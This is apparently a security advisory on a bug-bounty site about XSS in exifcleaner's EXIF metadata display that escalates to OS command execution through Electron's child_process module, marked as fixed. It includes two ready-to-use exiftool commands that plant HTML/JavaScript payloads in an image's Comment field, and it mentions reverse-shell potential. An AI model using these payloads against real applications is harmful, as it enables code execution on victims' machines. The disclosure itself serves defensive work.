OS Command Injection in sztheory/exifcleaner

Valid

Reported on

May 3rd 2021

✍️ Description

Command Injection using XSS via EXIF Data.

The application displays the image metadata in HTML format without removing malicious tags, therefore an XSS attack can be performed.

exiftool -Comment='</strong><img src=x onerror=alert(1) /><b>OverJT</b>' MY_IMAGE.png

Being an application made in electron, it allows to easily scale the XSS to a OS code execution attack through the child-process module.

exiftool -Comment='</strong><img src=x onerror=window.require("child_process").execFile("/usr/bin/firefox") /><b>OverJT</b>' MY_IMAGE.png

An attacker can create an image with malicious metadata to run a reverse shell

table_update_row.ts L38

commented 3 years ago

Researcher

Fixed by the exifcleaner team

commented 3 years ago

Admin

I have tracked the patch commit SHA against this advisory.

All green now, thanks for the heads up @Jonathan.

to join this conversation

commented 3 years ago

Researcher

Fixed by the exifcleaner team

commented 3 years ago

Admin

I have tracked the patch commit SHA against this advisory.

All green now, thanks for the heads up @Jonathan.

to join this conversation